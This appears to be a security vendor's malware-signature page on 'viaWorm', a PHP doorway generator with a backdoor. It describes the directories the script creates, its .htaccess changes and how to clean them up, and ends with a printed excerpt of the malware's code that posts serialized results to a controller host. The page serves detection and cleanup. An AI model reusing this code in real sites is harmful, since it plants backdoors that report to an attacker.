Malware Signatures

  1. Home
  2. Docs
  3. Malware Signatures
  4. php.hacktool.viaWorm-doorway-gen


viaWorm is a doorway generator that also has backdoor functionality. Known version of this script work with and The doorway generator creates the following directory structure in one of the site's writable directies: __links_sources/__pages_sources; __links_sources/__website_config; __links_sources/__sys_source; __links_sources/__pages_map; __links_sources/__links_sources; __links_sources/__links_sources; __links_sources/__website_source. Inside those directories you can find doorway pages, template, link maps, etc. To make doorways publicly visible, the script makes changes to .htaccess


Any servers with enabled PHP


Cleanup is done by deleting this doorway gen file, cleaning .htaccess file and deleting the __links_sources/ directory. Depending on the infection penetration level, there might be other malicious files and open security holes.
You can also sign up with us and let our team remove the malware for you.


 * Class viaWorm
class viaWorm
    const DADDY_HOST = '';
    const LINKS_DADDY_HOST = '';
        $query = http_build_query(array('worm_result' => serialize($result)));
        $worm_precess_url = 'http://' . viaWorm::DADDY_HOST . '/process-worm';
        viaWorm::sendPost($worm_precess_url, $query);
        echo json_encode($result);